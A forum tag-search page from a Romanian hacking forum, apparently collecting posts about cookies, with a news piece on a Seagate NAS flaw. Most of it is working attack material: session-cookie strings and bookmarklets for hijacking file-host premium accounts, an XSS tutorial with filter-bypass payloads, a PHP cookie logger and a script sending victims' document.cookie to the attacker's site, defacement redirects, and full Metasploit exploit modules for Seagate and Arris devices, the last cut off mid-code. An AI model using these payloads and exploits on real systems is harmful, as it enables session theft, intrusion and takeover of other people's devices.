Jump to content

Search the Community

Showing results for tags 'cookie'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Fake News Romania
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 10 results

  1. Cookie %26id%3D7966032%26pw%3D4d9012b4a77a9524d675dad27c3276ab5705e5e8%26cks%3D2708d9d0e36e %26id%3D6257396%26pw%3Dcad1524360e58851cd0ae1e82b75ff5283474667%26cks%3D02f673a8fbc2 %26id%3D13068390%26pw%3Dd6aa9171e302378fdeb3ccf09e6dee703efe1700%26cks%3D0afdf4c70886 %26id%3D6102943%26pw%3D2c6e228379589e9bfb8c61bcd7def9c3a1c7d195%26cks%3D4d65c2cb70b1
  2. javascript:%20var%20domain%20=%20'uploaded.net';var%20cookies%20=%20new%20Array();cookies['login']%20='%26id%3D3515726%26pw%3Df059f890b34d847989aab5cbff1b1db28fba4b60%26cks%3D71b098b74bde';if%20(location.href.indexOf(domain)==-1)%20{var%20g%20=%20confirm('Welcome%20'%20+%20domain%20+%20'%20page.%20Copy%20again%20the%20script%20to%20address%20bar%20and%20run%20again%20this%20script%20.%20Continue?');if%20(g)%20{location.href%20=%20'http://'%20+%20domain;}}%20else%20{alert("..::Premiumangle.com%20::..");for(var%20i%20in%20cookies){void(document.cookie%20=%20i+'='+cookies[i]+';domain=.'+domain+';path=/;');}location.href%20=%20'http://'+domain;}
  3. javascript:%20var%20domain%20=%20'multihosters.com';var%20cookies%20=%20new%20Array();cookies['.ASPNETAUTH']%20='010159C9B4F3DE33D208FE5989C5C7CC37D208010D6600640075006E006B0040006100740074002E006E0065007400064D0065006D00620065007200012F00FF';if%20(location.href.indexOf(domain)==-1)%20{var%20g%20=%20confirm('You%20will%20be%20redirected%20to%20'%20+%20domain%20+%20'.%20You%20will%20have%20to%20run%20this%20script%20again.%20Continue?');if%20(g)%20{location.href%20=%20'http://'%20+%20domain;}}%20else%20{alert("..::%20Premiumangle.com%20::..");for(var%20i%20in%20cookies){void(document.cookie%20=%20i+'='+cookies[i]+';domain=.'+domain+';path=/;');}location.href%20=%20'http://'+domain;}
  4. https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762
  5. Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lately been flooding, and I've recieved a lot of requests on making this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS. What is XSS? XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS. What is HTML and Javascript? HTML HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML. Javascript Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic. XSS: My first attack. Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet. Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS. Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics. Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar. So, lets try putting in the most known, BASIC query of all time. <script>alert("XSS")</script> That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter: <script>alert("XSS")</script> > <script>alert( > XSS DETECTED < )</script> It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message . We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this: String.fromCharCode(88,83,83) Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like: <script>alert(String.fromCharCode(88,83,83))</script> You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use: "><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83))</script> '><script>alert("XSS")</script> '><script>alert(String.fromCharCode(88,83,83))</script> <ScRIPt>aLeRT("XSS")</ScRIPt> <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> "><ScRIPt>aLeRT("XSS")</ScRIPt> "><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> '><ScRIPt>aLeRT("XSS")</ScRIPt> '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> </script><script>alert("XSS")</script> </script><script>alert(String.fromCharCode(88,83,83))</script> "/><script>alert("XSS")</script> "/><script>alert(String.fromCharCode(88,83,83))</script> '/><script>alert("XSS")</script> '/><script>alert(String.fromCharCode(88,83,83))</script> </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ";alert("XSS");" ";alert(String.fromCharCode(88,83,83));" ';alert("XSS");' ';alert(String.fromCharCode(88,83,83));' ";alert("XSS") ";alert(String.fromCharCode(88,83,83)) ';alert("XSS") ';alert(String.fromCharCode(88,83,83)) Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot. XSS: Advanced Methods Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN. Cookie Stealing/Logging Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process. First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there. Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)). <?php /* * Created on 16. april. 2007 * Created by Audun Larsen (audun@munio.no) * * Copyright 2006 Munio IT, Audun Larsen * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ if(strlen($_SERVER['QUERY_STRING']) > 0) { $fp=fopen('./CookieLog.txt', 'a'); fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n"); fclose($fp); } else { ?> var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; // == // URLEncode and URLDecode functions // // Copyright Albion Research Ltd. 2002 // http://www.albionresearch.com/ // // You may copy these functions providing that // (a) you leave this copyright notice intact, and // ( if you use these functions on a publicly accessible // web site you include a credit somewhere on the web site // with a link back to http://www.albionresearch.com/ // // If you find or fix any bugs, please let us know at albionresearch.com // // SpecialThanks to Neelesh Thakur for being the first to // report a bug in URLDecode() - now fixed 2003-02-19. // And thanks to everyone else who has provided comments and suggestions. // == function URLEncode(str) { // The Javascript escape and unescape functions do not correspond // with what browsers actually do... var SAFECHARS = "0123456789" + // Numeric "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic "abcdefghijklmnopqrstuvwxyz" + "-_.!~*'()"; // RFC2396 Mark characters var HEX = "0123456789ABCDEF"; var plaintext = str; var encoded = ""; for (var i = 0; i < plaintext.length; i++ ) { var ch = plaintext.charAt(i); if (ch == " ") { encoded += "+"; // x-www-urlencoded, rather than %20 } else if (SAFECHARS.indexOf(ch) != -1) { encoded += ch; } else { var charCode = ch.charCodeAt(0); if (charCode > 255) { alert( "Unicode Character '" + ch + "' cannot be encoded using standard URL encoding.\n" + "(URL encoding only supports 8-bit characters.)\n" + "A space (+) will be substituted." ); encoded += "+"; } else { encoded += "%"; encoded += HEX.charAt((charCode >> 4) & 0xF); encoded += HEX.charAt(charCode & 0xF); } } } // for return encoded; }; cookie = URLEncode(document.cookie); html = '<img src="'+ownUrl+'?'+cookie+'">'; document.write(html); < ?php } ?> Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin . To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too. To Tiny the URL, go to SPAM and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging. <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it. Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it. Defacing Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.) <script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script> XSS: Onmouseover Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this: onmouseover=prompt1337 We can exploit this, by editing it to: onmouseover=alert("XSS") Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now. XSS Filter Bypassing Techniques Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS. There are many ways on bypassing XSS filters, but I will only explain a few. Hex Bypassing With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out: > = %3c < = %3c / = %2f ASCII Bypassing With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this: NOT WORKING SCRIPT <script>alert("XSS")</script> WORKING SCRIPT <script>alert(String.fromCharCode(88,83,83))</script> To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful. Case-Sensitive Bypassing This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this: <ScRiPt>aLeRt("XSS")</ScRiPt> You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones. Some XSS Dorks It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share: inurl:search.php? inurl:find.php? inurl:search.html inurl:find.html inurl:search.aspx inurl:find.aspx Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent. Source : Hack Forums - Site Challenge
  6. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit4 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution', 'Description' => %q{ Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device. }, 'Author' => [ 'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module ], 'References' => [ ['CVE', '2014-8684'], ['CVE', '2014-8686'], ['CVE', '2014-8687'], ['EDB', '36202'], ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'], ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/'] ], 'DisclosureDate' => 'Mar 01 2015', 'Privileged' => true, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Payload' => {'DisableNops' => true}, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to the application root', '/']), OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']), OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']), OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07']) ]) end # # Write a string value to a serialized PHP object without deserializing it first. # If the value exists it will be updated. # def set_string(php_object, name, value) prefix = "s:#{name.length}:\"#{name}\";s:" if php_object.include?(prefix) # the value already exists in the php blob, so update it. return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"") end # the value doesn't exist in the php blob, so create it. count = php_object.split(':')[1].to_i + 1 php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}") end # # Findez ze holez! # def check begin res = send_request_cgi( 'uri' => normalize_uri(target_uri), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' } ) if res && res.code == 200 headers = res.to_s # validate headers if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') # and make sure that the body contains the title we'd expect if res.body.include?('Login to BlackArmor') return Exploit::CheckCode::Appears end end end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable # something went wrong, assume safe. end Exploit::CheckCode::Safe end # # Executez ze sploitz! # def exploit # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin print_status("#{peer} - Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' } }) if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ cookie_value = $1.strip else fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") end # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting print_status("#{peer} - Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) vprint_status("#{peer} - PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) # Step 3 - Extract the current host configuration so that we don't lose it. host_config = nil # This time value needs to be consistent across calls config_time = ::Time.now.to_i begin print_status("#{peer} - Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time } ) if res && res.code == 200 res.body.split("\r\n").each do |l| if l.include?('general_setup') host_config = l break end end else fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") end print_good("#{peer} - Host configuration extracted.") vprint_status("#{peer} - Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations # and we can't put anything in with '$' in it. So we need to make a simple install # payload which will write a required payload to disk that can be executes directly # as the last part of the payload. This will also be self-deleting. param_id = rand_text_alphanumeric(3) # There are no files on the target file system that start with an underscore # so to allow for a small file size that doesn't collide with an existing file # we'll just prefix it with an underscore. payload_file = "_#{rand_text_alphanumeric(3)}.php" installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") vprint_status("#{peer} - Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML # spits out. desc_start = host_config.index('" description="') + 15 desc_end = host_config.index('"', desc_start) xml_payload = host_config[0, desc_start] + stager + host_config[desc_end, host_config.length] vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk print_status("#{peer} - Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time }, 'vars_post' => { 'general_setup' => xml_payload } ) unless res && res.code == 200 fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end print_good("#{peer} - Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. print_status("#{peer} - Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" errored = false begin res = send_request_cgi( 'uri' => normalize_uri(target_uri), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}", 'vars_post' => { param_id => Rex::Text.encode_base64(self_deleting_payload) } ) if res && res.code == 200 print_good("#{peer} - Stager execution succeeded, payload ready for execution.") else print_error("#{peer} - Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable print_error("#{peer} - Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. print_status("#{peer} - Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", 'vars_get' => { '_' => config_time }, 'vars_post' => { 'general_setup' => host_config } ) # Step 8 - invoke the installed payload, but only if all went to plan. unless errored print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', 'headers' => { 'Accept' => 'text/html' }, 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}" ) end end # # Take a CodeIgnitor cookie and pull out the PHP object using the XOR # key that we've been given. # def decode_cookie(cookie_content) cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content)) pass = xor(cookie_value, datastore['XORKEY']) result = '' (0...pass.length).step(2).each do |i| result << (pass[i].ord ^ pass[i + 1].ord).chr end result end # # Take a serialised PHP object cookie value and encode it so that # CodeIgniter thinks it's legit. # def encode_cookie(cookie_value) rand = Rex::Text.sha1(rand_text_alphanumeric(40)) block = '' (0...cookie_value.length).each do |i| block << rand[i % rand.length] block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr end cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) vprint_status("#{peer} - Cookie value: #{cookie_value}") cookie_value end # # XOR a value against a key. The key is cycled. # def xor(string, key) result = '' string.bytes.zip(key.bytes.cycle).each do |s, k| result << (s ^ k) end result end # # Simple XML substitution because the target XML handler isn't really # full blown or smart. # def xml_encode(str) str.gsub(/</, '<').gsub(/>/, '>') end end
  7. Seagate, a popular vendor of hardware solutions, has a critical zero-day vulnerability in its Network Attached Storage (NAS) device software that possibly left thousands of its users vulnerable to hackers. Seagate's Business Storage 2-Bay NAS product, found in home and business networks, is vulnerable to a zero-day Remote Code Execution vulnerability, currently affecting more than 2,500 publicly exposed devices on the Internet. Seagate is one of the world’s largest vendor of hardware solutions, with products available worldwide. After Western Digital, Seagate ranked second and holds 41% of the market worldwide in supplying storage hardware products. A security researcher, named OJ Reeves, discovered the zero-day remote code execution vulnerability on 7th October last year and, reported to the company totally in the white hat style. But even after 130 days of responsible disclosure, the zero-day bug remains unpatched till now. In order to exploit the vulnerability, an attacker needs to be on the same network as the vulnerable device which gives the attacker root access of the vulnerable device, without the need of a valid login. Reeves also released a python exploit along with its Metasploit module version which is available on Github. ORIGIN OF ZERO-DAY VULNERABILITY Seagate's Business Storage 2-Bay NAS products come with a web-enabled management application that lets administrators to perform device configuration functions such as adding users, setting up access control, managing files, and more. This web application is built with three core technologies, including PHP version 5.2.13, CodeIgniter version 2.1.0 and Lighttpd version 1.4.28, which are all out-dated versions. PHP version 5.2.13 is vulnerable (CVE-2006-7243) that allows user-controlled data to prematurely terminate file paths, allowing for full control over the file extension. CodeIgniter version prior to 2.2.0 is vulnerable (CVE-2014-8686) that allows an attacker to extract the encryption key and decrypt the content of the cookie. Once decrypted, attacker can modify the content of the cookie and re-encrypt it prior to submitting it back to the server. The custom web application authenticate the login user based upon browser cookies, having three parameters: username: logged in user name is_admin: user is admin or not i.e. Yes or No language: chosen language (eg. en_US) Researcher explained that there is no further validation of user credentials at server-end, once username cookie is established, which could be impersonated easily by an attacker. Another parameter 'is_admin' can be manipulated to 'Yes' value that allows the attacker to self-elevate to administrative privileges in the web application itself. The language parameter can be manipulated for exploitation of a local file inclusion vulnerability. At last, the web application is being executed by an instance of Lighttpd which is running under the context of the root user. When an attacker makes a request with the manipulated cookie, it results in arbitrary code execution as root user. Therefore, successful exploitation of this vulnerability could result in taking complete control of the vulnerable device as a root user. VULNERABLE PRODUCTS Two different network storage devices made by Seagate were tested and found to be vulnerable. The latest Seagate NAS firmware version listed below are affected by this zero-day vulnerability: Business Storage 2-Bay NAS version 2014.00319 Business Storage 2-Bay NAS version 2013.60311 However, Reeves believes that all versions of Business Storage 2-Bay NAS product prior to 2014.00319 are affected by the same vulnerability. METASPLOIT MODULE AVAILABLE A Metasploit module and a Python script to exploit the vulnerability automatically is available on the Github. Each of these scripts are able to perform the following tasks: Connects to the vulnerable NAS device and extracts a ci_session cookie. Decrypts the cookie using the static encryption key and extracts the PHP hash. Modifies the serialized PHP hash so that the username is set to 'admin' and the is_admin field is set to 'yes'. Encrypts this updated PHP hash ready for further use as a ci_session cookie, which allows future requests to operate on the NAS as if they were an administrator. Performs a request to extract the host configuration, which includes the device's description. Modifies the host configuration so that the device description contains a small stager payload. Performs a request to update the host configuration with the new data so that the stager payload is written to /etc/devicedesc. Modifies the PHP hash again so that the language parameter contains the value ../../../../etc/devicedesc\x00. Encrypts this new PHP hash ready for future use as a ci_session cookie. Performs a request to the NAS using the cookie created in the previous step, which invokes the stager that was written to disk. This request posts a larger payload which is written to disk under the web server root. Performs another request which then resets the host configuration back to what it was prior to exploitation. According to Reeves, there was no updated firmware version available for download that contains patches for the issues, even after contacting the company multiple times. Users of Seagate's Business Storage NAS products and and other products using vulnerable firmware are recommended to ensure that their devices are not accessible via the public Internet and that the devices be located behind a firewall configured to allow only a trusted set of IP addresses to connect to the web interface. Source
  8. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Arris VAP2500 tools_command.php Command Execution', 'Description' => %q{ Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8423'], ['CVE', '2014-8424'], ['OSVDB', '115045'], ['OSVDB', '115046'], ['BID', '71297'], ['BID', '71299'], ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/'] ], 'DisclosureDate' => 'Nov 25 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/tools_command.php', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end def exploit_cmd beg_boundary = rand_text_alpha(8) end_boundary = rand_text_alpha(8) begin res = send_request_cgi({ 'uri' => 